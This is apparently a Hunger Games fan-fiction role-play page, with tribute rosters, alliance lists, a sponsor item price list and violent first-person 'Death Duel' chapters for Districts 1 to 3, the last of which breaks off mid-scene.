District 4 Duel: Flick Rivers (300th), Cody Freshwater (301st), Trident Bekke (302nd), Giller McFish (325th), Wayne Defleckt (325th), Kaylay Netter (300) Wari Oceani (301), Nymph Mere (325), Fressa Saltie (325), & Seafoam Majesty (326)

District 5 Duel: Trenton Powers (300), Watt Powers (301), Tameo Arghus (302), Sebastian Hive (325), Philo Ventus (326), Allie Costigan (300), Swift Twirpshkin (301), Allana Darkbloom (325), & Bonnie Cougar (326)

District 6 Duel: Cosmo Fyngelli (300), Xavier Woods (301), Illegal Drugs (302), Zak Slaughter (325), Wolbert Toonico (325), Belladonna Saware (300), Luna Fern (301) Bluffy Silvestein (302), Eleith Lightstorm (325), & Blondie Genesis (326)

District 7 Duel: Ransom Overman (301), Wocky Oak (302), & Frade Spectrus (326), May-Ann Hunter (300), Nastya Gushkin (301), Maple Leavestruck (325), Chumps Harvaria (325), & Voolia Kelopi (326)

District 8 Duel: Nick Kobarg (300), Josef Wilder (301), Jax Griffin (325), Tot Tenham (325), Yuri Collins (326), Coco Joansi (300), Freya Prada (302), Galina Von Dover (325), Catalina Tweed (325), & Odessa Garnetstone (326)

District 9 Duel: Eli Dawn (300), Mark Haulk (301), Hunther Hayes (302), Folly Rover (325), Tito Granso (326), Plasma Perimen (300), Perrie Grain (301), Layla Twozone (325), & Vera Luchabra (326)

District 10 Duel: Morolith Dmitry (300), Bronco Bagwell (301), Alec Cohen (325), Kwarts Diodin (325), Alex Lexys (326), Gracie King (300), Seeker Amaryllis (301), Ellis Blackberry (302), Alecia Cohen (325), & Cassie Lexys (326)

District 11 Duel: Wess Cornstob (300), Shimdt Raspberry (302), Trent Korey (325), Seez Croppley (325), Zippy Oakster (326), Flow’r Raspberry (301), Rasp Southern (302), Flora Sapsling (325), Eva Destiny (325) & Flippy Twinmind (326)

District 12 Duel: Gogh Lizta (300), Knight Castle (302), Jack Cayman (325), Julian (325), Regina Victorious (301), Mina Ebony (302), Salem Calla (325), Thalia Combe (325) & Steammie Pic (326)

District 13 Duel: Aeron Ashkyn (302), Harley Swoop (325), Douglas Biles (326), Saidy Dauntless (301), Kiara Mitchell (302), Violetta Nobel (325), & Jenessa Whitten (326)

Capitol Duel: Avian Monte (302), Josool Wiranda (325), Dexter Malon (325), Olympic Oblado (326), Shervert Wonkalandia (301), Flawra Moonshadow (325), Amelia Puregold (325), & Isolde Blair (326)

Tributes

District Type Gender Name Age Height Weapon User
Capitol New Male Kaneki Urashi 15 5'9 Double Glaive WongPongSoup
Capitol Voted Male Ramon Constancy 18 6'2 Bow & Arrows VDA1999
Capitol Duel Male Josool Wiranda 14 5'1 Bow, Throwing Knives SuperTomato
Capitol New Female Mahogany Vesta 17 5'8 Throwing Knives TheFireJay
Capitol Voted Female Flame Vapore 16 5'11 Axe, Dagger Mistfire333
Capitol Duel Male Olympic Oblado 18 5'7 Machete SuperTomato
0 New Male Todd Evans 18 6'3 Brass Knuckles, Knife Glove YourFavoriteSalmon
0 Voted Male Solar Energy 15 5'6 Spear TheFireJay
0 New Female Rosalina Cosmic 14 5'2 Throwing Knives TheFireJay
0 Voted Female Aelia Freedome 17 5'7 Spear Mistymolla
1 New Male Cullinan Beryll 18 6'3 Iron Shoes Nlby001
1 Voted Male Jake Locketback 18 5'10 Spear, Bow MarinaTheTenkaiKnight
1 Duel Male Elvis Alexander 18 6'2 Sword, Spear SuperTomato
1 New Female Anissa Fallows 17 6'2 Bow, Throwing Knives Mistymolla
1 Voted Female Trinity Mace 17 5'2 Knife, Mace YourFavoriteSalmon
1 Duel Male Cole Harrison 18 6'3 Mace, Spear Kaegan-is-a-tribute
2 New Male Rodeo Baldios 16 6'5 Hand-to-Hand combat SerpentKing999
2 Voted Male Luigi Wilkins 17 6'1 Sword, Throwing Knives MyWorld
2 Duel Female Pansy Costella 18 5'7 Scimitar AxedFox
2 New Female Ena Shea 17 5'9 Ice pick, Bow Aerialchinook
2 Voted Female Carmine Morrisa 16 5'9 Warhammer, Mace Pippycat
2 Duel Female Chloe Black 16 5'7 Sword, Throwing Knives CatoET
3 New Male Caspian Mahoney 18 6'2 Sword, Chakram CToaURN
3 Voted Male Courage Blitz 14 5'7 Sword Jabberjay78
3 Duel Male Noah Everest 13 5'4 Throwing Axes Theman77
3 New Female Ziya Ashton 15 5'6 Throwing Knives, Hammer Aerialchinook
3 Voted Female Annabeth March 16 5'4 Bow, Sickle FrostyFire
3 Duel Male Chip Parks 15 5'5 Mines, Knives MissRandomStuff
4 New Male Dylan Murrow 17 5'10 Trident, Throwing Knives Sambaroses
4 Voted Male Ryan Marine 17 5'10 Trident, Knives TheFireJay
4 Duel Male Trident Bekke 15 5'10 Trident, Net Junior II
4 New Female Sheol Argos 16 6'0 Scissors SerpentKing999
4 Voted Female Mizu Fall 16 5'4 Teeth, Trident Mistymolla
4 Duel Female Fressa Saltie 17 5'11 Trident, Throwing Knives FrostyFire
5 New Male Seth Rollins 18 6'0 Axe, Longsword Misfire333
5 Duel Male Watt Powers 14 5'4 Blowgun, Snares Attackcobra
5 Voted Male Johnathan Mikeal 18 6'5 Sword, Spear YourFavoriteSalmon
5 New Female Ashley Curtis 14 5'4 Bow, Dagger MyWorld
5 Duel Male Sebastian Hive 18 6'1 Butcher Knife Nommehzombies
5 Voted Female Trick Treat 17 5'9 Anything Hybrid Shadow
6 New Male Stario Lucaren 13 5'4 Throwing Knives, Dagger MyWorld
6 Duel Male Wolbert Toonico 18 6'0 Sword Supertomato
6 Voted Male Blade Spectrus 14 5'4 Spear, Sword tehblakdeath
6 New Female Kennedy Marks 18 5'8 Dagger Bacon Canadian
6 Duel Female Luna Fern 14 5'4 Axe Mistymolla
6 Voted Female Amore Madness 16 5'6 Spear, Crossbow Mistfire333
7 New Male Axel Alex 17 6'2 Throwing Axe, Axe Striker12345
7 Duel Male Wocky Oak 16 5'5 Axe, Throwing Knives FrostyFire
7 Voted Male Shade Spectrus 16 6'2 Dagger, Crossbow Mistfire333
7 New Female Amethystia Thall 15 5'3 Mace, Throwing Axe MarinaTheTenkaiKnight
7 Duel Male Frade Spectrus 14 5'4 Dagger, Crossbow Mistfire333
7 Voted Female Arbor Alpine 17 5'5 Axe Hybrid Shadow
8 New Male Jet Flack 15 6'1 Sword, Crossbow Striker12345
8 Duel Male Josef Wilder 18 5'11 Crossbow, Knives Attackcobra
8 Voted Male Banette Tsukomogami 15 5'5 Needles, Knives Mistfire333
8 New Female

Camiren Paisley-Idylwyld

17 5'7 Sword, Dagger Summer Bee 13
8 Duel Female Freya Prada 13 5'6 Crossbow Mistymolla
8 Voted Female Aisha Hakeem 15 5'6 Throwing Knives, Axes Aerialchinook
9 New Male Harvest Cropper 14 5'7 Sickle, Scythe Wolfgirl23
9 Duel Female Plasma Perimen 16 5'11 Machete Dedejacob
9 Voted Male Jac Price 16 5'9 Sword TheFireJay
9 New Female Amira Blodwen 14 5'6 Bow, Scythe Sambaroses
9 Duel Female Vera Luchabra 18 6'2 Axe, Club Andy1854
9 Voted Female Azalea Finch 16 5'5 Scythe, Bow Aerialchinook
10 New Male Marlon Lander 12 5'3 Scythe, Bow Yoonie
10 Duel Female Ellis Blackberry 16 5'7 Throwing Knives, Spear EmpressOreo
10 Voted Male Billy McGranger 14 5'3 Whip Wolfgirl23
10 New Female Madeva McGranger 18 6'4 Whip, Knives Wolfgirl23
10 Duel Female Cassie Lexys 14 5'4 Crossbow, Blowgun MissRandomStuff
10 Voted Female Fawn Talons 16 5'9 Scythe, Throwing Knives Sambaroses
11 New Male Caliban Rweed 17 6'3 Sword, Dagger tehblakdeath
11 Duel Male Wess Cornstob 17 6'1 Sword, Throwing Axe FrostyFire
11 Voted Male Crimson Typhoon 14 5'6 Bow, Sword AwesomeAidan
11 New Female Annabelle Harret 14 5'5 Bow, Throwing Knives YourFavoriteSalmon
11 Duel Male Trent Korey 18 6'0 Spear, Trident MissRandomStuff
11 Voted Female Daisy Lilac 16 5'7 Machete, Dagger Aerialchinook
12 New Male Falk Avian 13 5'7 Bow & Arrows Yoonie
12 Duel Female Thalia Combe 16 5'7 Bow, Throwing Knives Nommehzombies
12 Voted Male Ganta Alomo 15 5'8 Needles WongPongSoup
12 New Female Curricular Lunes 17 5'7 Cleaver, Knife Blissfully Mine
12 Duel Female Salem Calla 15 4'11 Poison, Throwing Knives Foxface D5
12 Voted Female Misty Honeysuckle 14 5'1 Sword, Blowgun Sambaroses
13 New Male Julian Veritas 15 5'11 Machete, Bow Pippycat
13 Duel Male Douglas Biles 15 5'7 Wire, Spear Aerialchinook
13 Voted Male Radiant Tayz 16 5'11 Sword, Crossbow tehblakdeath
13 New Female Adreanna Danish 17 5'11 Hand-to-Hand combat Blissfully Mine
13 Duel Female Jenessa Whitten 15 5'9 Throwing Knives Socks6363
13 Voted Female Zoey Proasheck 15 5'8 Axe, Katana tehblakdeath
14 New Male Dean Ambrose 18 6'4 Knife, Axe Mistfire333
14 Voted Male Luxray Meganium 18 6'5 Morning Star tehblakdeath
14 New Female Amica Belle 17 5'8 Knife, Mace Mistymolla
14 Voted Female Amaya Lovelace 16 5'2 Knife Mistymolla

Alliances

(Note: These alliances are not final and are subject to change.)

Careers: Todd Evans (0), Cullinan Beryll (1), Jake Locketback (1), Elvis Alexander (1), Cole Harrison (1), Trinity Mace (1), Luigi Wilkins (2), Chloe Black (2), Pansy Costella (2), Dylan Murrow (4), Trident Bekke (4), Sheol Argos (4), Seth Rollins (5), Trent Korey (11), Luxray Meganium (14), Dean Ambrose (14), & Olympic Oblado (C)

Splinter Careers: Carmine Morrisa (2), Ena Shea (2), Zoey Proasheck (13), & Josool Wiranda (C)

Anti-Careers: Blade Spectrus (6), Wolbert Toonico (6), Frade Spectrus (7), Shade Spectrus (7), Crimson Typhoon (11), Daisy Lilac (11), Misty Honeysuckle (12), & Radiant Tayz (13)

Aelia's Alliance: Aelia Freedome (0), Anissa Fallows (1), Amore Madness (6), Luna Fern (6), Aisha Hakeem (8), Freya Prada (8), Ellis Blackberry (10), Annabelle Harret (11), Ganta Alomo (12), Falk Avian (12), Salem Calla (12), Amaya Lovelace (14), Amica Belle (14), & Mahogany Vesta (C)

700th Comment Alliance: Sebastian Hive (5), Watt Powers (5), & Thalia Combe (12)

District 3 & 12 Alliance: Rosalina Cosmic (0), Caspian Mahoney (3) & Curricular Lunes (12)

District 5, 8, 9, & 13 Alliance: Johnathan Mikeal (5), Banette Tsukomogami (8), Harvest Cropper (9), & Julian Veritas (13)

District 5, 9, & 10 Alliance: Amira Blodwen (9), Marlon Lander (10), & Ashley Curtis (5)

District 6, 7, & 8 Alliance: Amethystia Thall (7), Kennedy Marks (6), Camiren Paisley (8), Douglas Biles (13), & Jenessa Whitten (13)

District 7 & 8 Alliance: Frade Spectrus (7) & Josef Wilder (8)

District 9 Alliance: Jac Price (9) & Azalea Finch (9)

District 9 Alliance: Vera Luchabra (9) & Plasma Perimen (9)

District 10 Alliance: Billy McGranger (10), Madeva McGranger (10), & Fawn Talons (10)

Loners: Solar Energy (0), Rodeo Baldios (2), Noah Everest (3), Chip Parks (3), Courage Blitz (3), Ziya Ashton (3), Mizu Fall (4), Axel Alex (7), Wocky Oak (7), Jet Flack (8), Cassie Lexys (10), Wess Cornstob (11), Caliban Rweed (11), Adreanna Danish (13), Kaneki Urashi (C), Ramon Constancy (C), & Flame Vapore (C)

Items Antidote (cures poison): $150

Anti-Infection: $125

Awl: $50

Alcohol: $75

Axe: $150

Baton: $100

Battleaxe $175

Blanket: $50

Blowgun: $125

Bow: $150

Bread: $50

Burn Cream: $125

Canteen: $75

Camouflage Paints: $100

Chakram: $175

Chlorine: $75

Cookies: $25

Crossbow: $175

Crackers: $15

Dagger: $100

Darts (12): $25

Dried Meat: $75

Dried Fruit: $50

Flail: $125

Flares x3: $125

Flashlight: $100

Hammer: $125

Instant Relief: $400

Iodine: $100

Knife: $50

Knife Glove: $100

Mace: $150

Mace (Chained): $175

Machete: $125

Matches: $75

Morning Star: $175

Gasoline $100

Hatchet: $150

Needles (3): $125

Net: $75

Net Trap: $125

Night-Vision Glasses: $150

Piece of Plastic: $15

Painkillers: $75

Poison: $100

Quiver of Arrows (12): $50

Raft: $125

Rocks: $15

Rope: $25

Scythe: $150

Shield: $125

Shield (Spiked): $200

Shurikens (5): $125

Sickle: $125

Sleeping Bag: $50

Sleep Syrup: $125

Slingshot: $75

Soup: $75

Spear: $125

Spike Trap: $250

Spile: $50

Sword: $150

Throwing Axes (3): $200

Throwing Knives (3): $200

Trident: $225

Water: $100

Whip: $75

Wire: $75

Wooden Club: $100

Wooden Club (Spiked): $150

Death Duels

District 1 Death Duel

Elvis Alexander (300th Games)

I'm in a very small room, there's absolutely nothing here but the tiled floors and ceiling that surround me. A metallic platform rests under my booted feet, ready to rise up and bring me into the Duel Arena.

Can't believe I'm even in this situation.

I've already been told what happened, how I got back into this place. How I need to kill every damn person who will join me in that small arena. Nine of us will enter but only two will leave. Only two will be in the 400th Hunger Games. They've given me some info cards to read to get myself adjusted to my opponents. The cards told me their names and how they performed in the Games but it's very light on the details. Still, I'm ready. I've prepared my entire life for the Games and I would have won my Games, the 300th, if it weren't for those treacherous traitors Di and Flick, jumping me from behind. My hands are already clenching into fists at my side at the mere thought of them.

The Games are meant to be played with honor. Those two knew nothing of honor. They were filthy cretins who lied, cheated, and stole their way through the Games. I wish they were in this Duel. Then I would wring their pathetic little necks.

"Prepare for Duel commencing!"

A robotic female voice comes through a speaker into my room. I shake my head vigorously, my blonde ponytail bouncing behind me. "Bring it on, baby!" I scream to the sky, ready for some violence. My body is ready.

"Platforms will now rise. Please stay in the center. Thank you."

I hear gears churning under my feet as the metal platform begins to rise. I'm excited, giddy almost. I don't think I've felt this level of anticipation since the first time I was brought into the arena. Apparently that was over a hundred years ago. Man, time flies when you're dead. The platform rises through the ceiling and then I'm in a dark tunnel. Very much like the arena. "I'm ready!" I howl as a light appears above my head. Then I arrive in the arena.

It's dark and after that bright light I can barely see anything, causing me to rub my eyes. It doesn't help but after a few seconds pass everything comes into focus. I'm in a cavern, of sorts. Dark musty rocks surround me, predictably smelling like soil and dirt. But that's not the attention grabbing. That's the giant diamonds.

Massive diamonds surround me, shining in the darkness. I don't see any outside light source for them to be reflecting, rather, it seems that they are the light source. "Coolio man!" I whistle as I stare at the diamonds, impressed. Plain white diamonds are the most common but there's others too, red diamonds, blue, green, yellow, even purple. There's one of just about every color.

I get so absorbed in watching these diamonds sparkle with their innate light that I don't even think to look around for other tributes. Not that there's any around. The cavern is dark and my view is impeded by this coolio diamonds. I'm supposing that the others are on platforms similar to mine. Just waiting out there...

A full minute passes before I realize something is wrong. There's been no announcement. No signal that the Duel has started. Nothing. What gives?

I bring my gaze back across the diamonds and cavern. I see nothing out of place. "Where's my signal, man?" I mutter aloud just before looking up. I don't know how I missed it before. A giant holographic screen shining on the roof of the cavern. Picture headshots of tributes are shown, along with their Games number. Nine District 1 tributes from five different Hunger Games stated down at me, my own face one of them. These are the losers, the dead. The tributes who died in their Games and weren't voted in to compete in the 327th. The ones nobody wanted to see compete again. My District partner from the 300th Games, Astrid Bellia, isn't among us. I'm pissed off I'm not with her and instead stuck here with the dregs. I am far above them!

Ding!

A quiet chiming noise echoes throughout the cavern, vibrating towards my ears. I'm just beginning to wonder what it means when one of the faces, the one of the girl from the 301st Hunger Games, blinks off. The portrait goes dark and red words scroll across reading "Deceased".

"Oh, hell no!"

I realize two things at once. One: That holographic screen is used to track whose still alive and fighting. And Two: The fact that someone has just died means that this Duel has already started. There is no announcement. The Duel just starts the moment you come into the arena.

I tighten my muscles and spring off of the platform. When my boot lands on the hard-packed dirt of the cavern, I have a brief fear that I'm wrong. That there will be landmines like in the Hunger Games. That I'll have my legs blown off. Luckily for me there's no explosion. My first guess was right, this Duel has already started.

I take off into the maze of diamonds, wondering how many of the others have already figured it out. At least one did. I mean, the girl didn't kill herself. I hope they haven't taken all of the weapons yet.

I've gone about ten feet forward when I skirt around a particularly large green diamond and come face to face with another tribute. The girl shrieks in alarm and jumps back. I make note of her long brunette hair with red highlights. It's one of the girls from the 325th Games. Skylar.

She throws her arms up for protection and I resist barking out laughter. What kind of District 1 tribute is she? She's an embarrassment to us all! I'll have no problem with fighting her. Too late the girl thinks to run. She's turned but my arms wrap around her and heave backwards. I don't have any weapons but I don't need any for this fight.

Skylar shouts for mercy as I grip my hands around her neck and slam her into the side of a diamond. She for silent immediately but I smash her head into the hard crystal several more times, just to make sure. After the fifth time her skull smacks into the diamond, I let go. Her neck hangs at an odd angle as she slips to the cold ground, leaving a long streak of blood across the beautiful diamond.

I spit and then crack my knuckles as another chime echoes through the cavern and Skylar's face dims. This should be fun.

Cole Harrison (325th Games)

Already two tributes have died. One of them being Skylar, a girl from my Games. I'm a bit torn seeing her dead. She was a terrible fighter, useless at almost everything. She was the first death of our Games after all. But she was also easy on the eyes. I'll miss her, if just for that.

I keep my ears open for any more chimes as I weave through the diamonds, in search of the weapons we were promised. No more chimes come as I reach what appears to be the edge diamond field. A large clearing rests in the center of all the diamonds that form a large circle around it. Crates full of weapons sit in an organized pattern, divided by weapon type. There's a crate full of swords, one with laces, axes, and spears. Just about every weapon I'd need. Great.

My eyes focused on a black handled spear, I step out into the clearing. Only then do I see the boy as he rises from the ground, a crimson liquid coating his hands and knees. Karma Blood. A boy from ny Games and a real freak at that. He loved to look at blood, collected it even. If that wasn't reason enough to hate him, there's also the fact that he betrayed me. "Where'd you get the blood, Karma?" I ask, stopping my progress. He lets out a low, sinister laugh and gestures at his feet.

"I found a pretty little donor!" He calls merrily and I see the girl. Blonde hair, green eyes. She was the first death of this Duel, Diamond Coman.

"You're a sick dude. You know that?" Diamond's throat had been torn open, revealing the bones and muscles inside. I can see the skin and blood under Karma's fingernails. No reason to wonder how it happened. He didn't even use a knife.

"Perhaps. But we all have our vices, don't we, Cole?" A smile spreads along his elongated face as he takes a step towards me. I spot the shape running out from the diamond maze and smile back.

"Yeah. Wonder what Warwickite's vices are?"

I take joy in the look of discomfort that crosses Karma's face right before Wariwickite blows into his back. The two boys fall to the ground, snarling as they wrestle for dominance. I don't know much about Warwickite. Just that he's from the 326th Games. But I trust he can handle Karma. I go sprinting for the spear I signalled out earlier but now I see that someone else has found the clearing. Raven Armor (302) slides a long katana out from the sword crate and grins wickedly at me.

"Game time, Cole!" My hands whip the spear out from its crate as I pass by, still sprinting at full speed. Raven sees me coming right for her and winds up swing at my head. Bad placement. I slide like a baseball player just as she unleashes the swing. She misses. I don't. My spear tip slices across her thigh and she drops to one uninjured leg, howling in pain. I spring back to my feet and thrust spear through the nape of her neck. Her howls of pain break off into bloody gurgles as the spear tip clogs her throat. She falls down, choking on her own blood as another chime goes off. "Oh yeah!" I give myself an imaginary high-five and turn to examine the clearing. Karma and Warwickite are still brawling, though it appears Karma is gaining the edge. I should go help--

"Think fast!"

I don't have time to think as a knife slices across the clearing, slashing into the tip of my spear and ripping it from my grasp. A girl with blonde haired tied back in a ponytail has appeared on the edge of clearing, a pair of throwing knives in hand. Where did she get those? Not from a crate, that's certain. But I don't have time to think about it. Kate (326) winds back her arm to throw another knife and I drop to the ground so hard that I swear I bruise my chest.

Not that I needed to. The knife doesn't even come for me. Instead, it cartwheels through the air and slams into the heart of an emerging Artemis, the second girl from my Games. She drops like a stone, dead on impact. Kate turns to me, priming the knife in her hand. "Crap."

I brace for another desperate dive when a figure lunges out from the diamond maze and grabs Kate from behind. I hear her squeal of panic as two thickly muscled arms wrap around her neck. She doesn't have time to use her knife before the arms give a sharp jerk and her neck snaps. She slides to the ground, dead.

Three more chimes go off as Elvis (300) stalks into the clearing. Instinctively, I look to the sky and the holographic scoreboard. The faces of Kate, Artemis, and Warwickite all dim at once, leaving only three more. Elvis, Karma, and myself.

"That was...most amusing," Karma rises from where Warwickite's body lies, stiff and unmoving. "He really knew how to fight. But still, he underestimated the power of one's fingers." He stretches his long fingers as he speaks and I grimace as I see the fresh blood that soaks them. Karma just smiles at me and pulls a sword out from a nearby crate. "Duel to the death? An honourable fight?" He asks, his voice dripping with mock politeness.

"No way. Two people can survive this Duel. Let's make it you and me. Let's just get him. He's unarmed!" I point towards Elvis, whose been watching our interaction with an emotionless face. Karma's crimson eyes flicker towards him and I see them light up when he sees I am right. Elvis has no weapons.

"Ah. I see. You wish to kill the weakling, avoid putting yourself at risk. Smart. Very smart." Karma sounds like a snake as he stops halfway between the two of us, his gaze flickering back and forth.

I shrug and pick up my fallen spear. "Seems like common sense, no? Why risk our own health when we could just team up and win unscathed?"

"Oh, you're clever. So very clever. But you see, I could never possibly bring myself to trust--"

His words turn into a brief scream of pain as my spear digs into his chest. He topples over and I race across the clearing, a wide grin on my face. "Of course you couldn't trust me! You already betrayed me once! No way was I letting it happen again, asshole!" I stomp on his face for emphasis, then a chime sounds. My spear pierced his heart, killed him instantly. Awesome.

"Coolio, man. Nice moves." Elvis comes walking towards me, applauding. His claps echo through the now deathly silent caverb. "Looks like you and me have something in common."

"Hmm?"

"We both really hate traitors!" He stops a few feet away from me and grins. After a moment I return it. I don't know this guy, but I already like him more than any allies I had in my first Games. I go to speak when trumpets interrupt and a voice I don't recognize speaks.

"Congratulations to the winners of the District 1 Death Duel! Elvis Alxexander and Cole Harrison! The two of you will join the pool of tributes competing in the 400th Annual Hunger Games!"

I grin like a fool as the voice fades and aan opening suddenly forms in the wall of the cavern. White suited people come pouring out and approach both me and Elvis. "We're the best District 1 has to offer," I tell him as the people begin to corrale us towards the opening that just formed. "And we should be the ones to lead the Careers!"

District 2 Death Duel

Teresa Silvers (325th Games)

When someone tells you that you've been asleep for over seventy-five years, you tend not to believe them. Except for when you consider that you've already died once and was somehow brought back to life. Then you'd believe anything they told you.

My room is empty and featureless, leaving absolutely no impression on me as I wait for this so-called "death duel" to begin. My mind is elsewhere anyways, focused on the family I once had. Are they dead now? Or just extremely old? I feel my stomach churn uncomfortably at either possibility. The fact that everyone I've ever known could be dead is...an unpleasant one. Very unpleasant.

I shuffle my feet around on the platform and try not to cry. Everyone I've ever loved is dead. Dead or an old, elderly person. What even awaits me back home? What would I return to? Is there even a point in winning these Games when I have nothing left? The only thing that I even feel slightly good about is the fact that the man who was stalking me when I was Reaped so long ago is dead too. I mean, he has to be dead, doesn't he?

"Prepare for Duel commencement."

A voice seeps into my small room and tears me from my thoughts. Beneath me, the metal platform has begun to stir and move.

"The platform will now rise. Please stay in the center. Thank you."

There's no sound as the platform begins to rise. I hear nothing but the thudding of my heart as I enter a dark tunnel and then emerge into a brand new locale. I recognize the room, though I've never been in one myself. Hammers and anvils, vats of molten metal and steamy pots of water. A musty smell hang in the air, one that reeks of iron and sweat.

I'm in a smithy

I'm just looking around for a few seconds when I notice the platforms that have risen beside me. Four of them. I recognize Chloe from my Games and then there's tiny Onyx (302) and arrogant Bethany (300). And a lone boy. A sneer is etched on his face as he leers at me with a very disturbing face. "I'm gonna kill you first!" He growls at me. His voice is low and menacing, his amber eyes filled with an insatiable bloodlust. I instinctively take a step back and too late do I remember that I'll have my legs blown off.

But I don't.

I don't have time to ponder this discovery before the boy hurtles off of his platform and comes sprinting towards me. Behind him, the other girls begin to fight. I shouldn't have stopped to watch that.

The boy's shoulders ram into my gut and he takes me to the ground. The square of my back smacks into the cold, cobbled bricks below and I feel the breath shoot out of me as the boy howls to the sky. "I am Drewsiff Bloodwonky! I am the blood hound!" He balls his hands into fists and sends them barreling down towards me but I roll out of the way, hearing the crack of his knuckles as they smash into the hard bricks. He screams and cradles his hands close as I bring my feet to my chest and then kick him hard in the gut. He falls back and I'm on him, hands gripped around his head. A stream of curses flow out of his mouth as I smack his skull back into the ground. His eyes roll up into his head and I hear a sickenly loud crack.

I let go and slump backwards, panting heavily. I feel no pity for the boy. He was a cold-blooded murderer who got what he deserved. I'm just worried about myself.

The smithy is alive with the sounds of fighting. Screams of pain, shouts of anger and the occasional chiming of a bell fill the air. I smell the scent of blood lingering in the air. Already I see Onyx (302) lies dead on the floor. Chloe and Bethany still fight nearby though. I don't want anything to do with them.

As I crawl behind the tables and anvils that litter the room, I finally notice that hologram on the ceiling. The faces of Onyx, Damian, and Drewsiff are already blanked out. Only seven left.

Eager to get a look at the other tributes, I cautiously rise up from the ground and look across the table I'm hidden behind. The giant boy, Yuki (325) is squaring off with Pansy (301). The crimson girl keeps dancing away from his grasp and he's getting visibly upset at his inability to catch her.

I hear movement behind me but I don't have time to react. A hand clamps over my mouth and then a voice speaks directly into my ear. "Go to sleep...."

Something sharp and metal cuts into my throat.

Pansy Costella (325th Games)

Yuki swings his massive fists towards me and I duck as his momentum sends his large frame barreling past me. He doesn't have a weapon, he doesn't need one. I've already seen how he killed my original District partner, Damian, with nothing but those fists of his. He's dangerous. "Stop moving!" He screams at me and once again sends a fist flying towards me. I roll sideways and avoid it.

"We both know I won't do that!" A grin forms on my face as he grunts and spins around much faster than I thought possible. He strikes me across the face with a massive backhand and I go sprawling to the floor, agony ripping through my jaw. Probably have a broken molar. Whiplash too. No time to think on it, Yuki stomps towards me and I roll, avoiding the deadly foot. "Just give up, you fat bastard!" I scream at him as I fall back towards the tables. I see a handled vat.

"Never!" He snarls and charges. I don't move.

Confusion crosses his face halfway towards me. He doesn't understand why I am not running, why I am not dodging. He soon learns why.

I smash my hand down onto the handle and the vat flies forward, spewing molten metal into Yuki's face and eyes. There's a delightful sizzling sound as Yuki stumbles backwards, howling and screaming as the metal burns his face and eyes. Pulling a long metal nail off of the table, I savagely kick Yuki in the knee, causing him to drop to my height.

He's still screaming. The metal has begun to merge with his face, a very painful looking thing. A smile crosses my face as I realize he's done for. "Shoulda just gave up!" I hoist the nail up and drive it into his chest, once, twice, thrice. His body gives one massive jerk and then he drops like a stone. Dead.

A chime goes off as I look away from the boy and observe the rest of the fighting. The Clarke siblings have Chloe cornered now. Johnny (300) holds a wicked hammer in his hands as the two of them approach the trapped girl.

"Looks like you have no weapons!" Bethany sneers at her. Chloe spits defiantly in he face. Bethany wipes it away and grins. "Oh, you shouldn't have done that!"

"Your death will be much more painful now!" Johnny agrees. The two of them step forward and then Johnny gives a half shout and falls to his knees. Bethany is screaming in shock as she sees the knife sticking out from his back. She didn't see what I did. Jeffrey (326) has slunk out from the shadows and is racing across the smithy, his knife in Johnny's back.

Bethany screams again as Jeff rips the knife back out from her brothers back. What an idiot. Jeff slashes the knife forward and her screams turn into gurgles as blood flows from a new gash in her throat. Jeff watches as she falls to the ground beside her dead brother. Two more chimes go off. Then a heavy metal hammer smashes in his skull.

He never saw it coming.

Jeff is dead on impact but Chloe continues to wail on his body, smashing it until he's an unrecognizable bloody mess. I position my fingers around the nail, ready to send it hurtling into Chloe's skull.

"Congratulations to the survivors of the District 2 Death Duel! Pansy Costella and Chloe Black!"

I hear the voice announce our victory. I just don't care. Chloe is still going to die. It'll just be one less opponent for me when the Games begin. I'm about to throw when a whistling noise pierces the air and my body is suddenly frozen. I can't move a muscle, everything is stiff as I feel an unknown energy pulsing through my body. Then the doors of the smithy open up and doctors pile in, followed by Peacekeepers.

They surround me and Chloe, who also appears to be frozen. One of the doctors stands in front of me. "You naughty little girl!" He waves a scolding finger at me as he grins. "Trying to get the drop on the competition? I'm afraid that just won't do." I try to tell him to go slag himself but I can't. So this immobility extends to my speech too. Swell. Just swell. The man turns to the others and barks out orders. "Get them out of here. They have a Hunger Games to compete in."

District 3 Death Duel

Noah Everest (300th Games)

I feel like I'm trapped back in that horrid cell as I nervously pace across my small room. Soon I'll be brought into an "arena" and be forced to fight with my fellow prisoners. Only two will survive. The rest must die.

I guess we should be grateful they're at least letting two of us live. I would have thought only one would survive.

"Prepare for Duel commencement."

I position myself in the exact center of the platform and wait as it slowly begins to rise. I wonder what our surroundings will be. They said it'd be something similar to our District export, so electronics, perhaps?

Yes. Yes, it's electronics. The platform rises into a command hub-like area. Giant, complex plasma monitors line the walls behind me and the other tributes. All of our platforms are placed in a circle around a ring of computers on a raised circle. Four stairways from each direction, north, south, east and west, lead up to the circle. In the center of the circle, I see a table. Laden with knives, wires and all sorts of electronic goodies.

Those will be our weapons.

The other tributes seem confused, dazzled by the lights of the plasma screens that show nothing but static. I'm the only one that has noticed there's no countdown. Nothing showing how long we have to stay on our platforms. Now, this can mean one of two things. Either they want someone to explode or there is no countdown.

I'm betting its the latter.

I've learned from my past mistakes. I lost the 300th Games and died because I ran from a fight, ran straight into a forcefield while fleeing. Well, this time I don't intend to run from the fighting. I'm going to run towards it.

The tributes near me don't even react as I hurtle off of the platform. They just watch as I pound up the stairs, heading for the table and weapons. I thought District 3 was supposed to be smart? I guess not. Maybe that's why we're all here instead of living a life of luxury in the Capitol.

I reach the top of the stairs and see that at least one other tribute has the same idea as me. Rebel Groots, the long haired emo kid from the 326th Games has just ascended the north staircase. We both stop to stare at one another and then lunge for the table.

He predictably grabs a knife, I grab the handle of a smooth black tazer. Within seconds he's slashing the knife at me. I dodge and then slide the switch on the taser from "Off" to "On", a small hum of electricity tells me that it's now active. Good.

Rebel swings for my head and I duck it, stepping forward to meet him. There's a flash of surprise in his eyes and then my taser pokes into his ribs.

There's a sharp crackling sound of electricity and then Rebel begins to convulse uncontrollably. Brilliant blue arcs of electricity race across his body, frying his innards. His eyes roll back into his head, his clothes smoke and sizzle and then he's falling to the floor.

The taser killed him within seconds.

There's no sense of grief, no loss. He wasn't a person. None of us are people. We lost our humanity back when we died in our Games. We lost our families, our friends and our dreams. We lost everything we cared about. Now we're just empty husks, husks with nothing to live for except life itself.

"Oh, God..."

A small feminine voice brings notice to the other tributes. It seems all of them are here now, standing on the edge of the four stairwells, watching me. They all seem shocked, terrified even. One of the girls (Elecctronny from the 325th Games I think) is shaking. The rest watch me with fearful gazes. I have the best weapon. I have the taser. I have the means of dealing death here. That makes me the target.

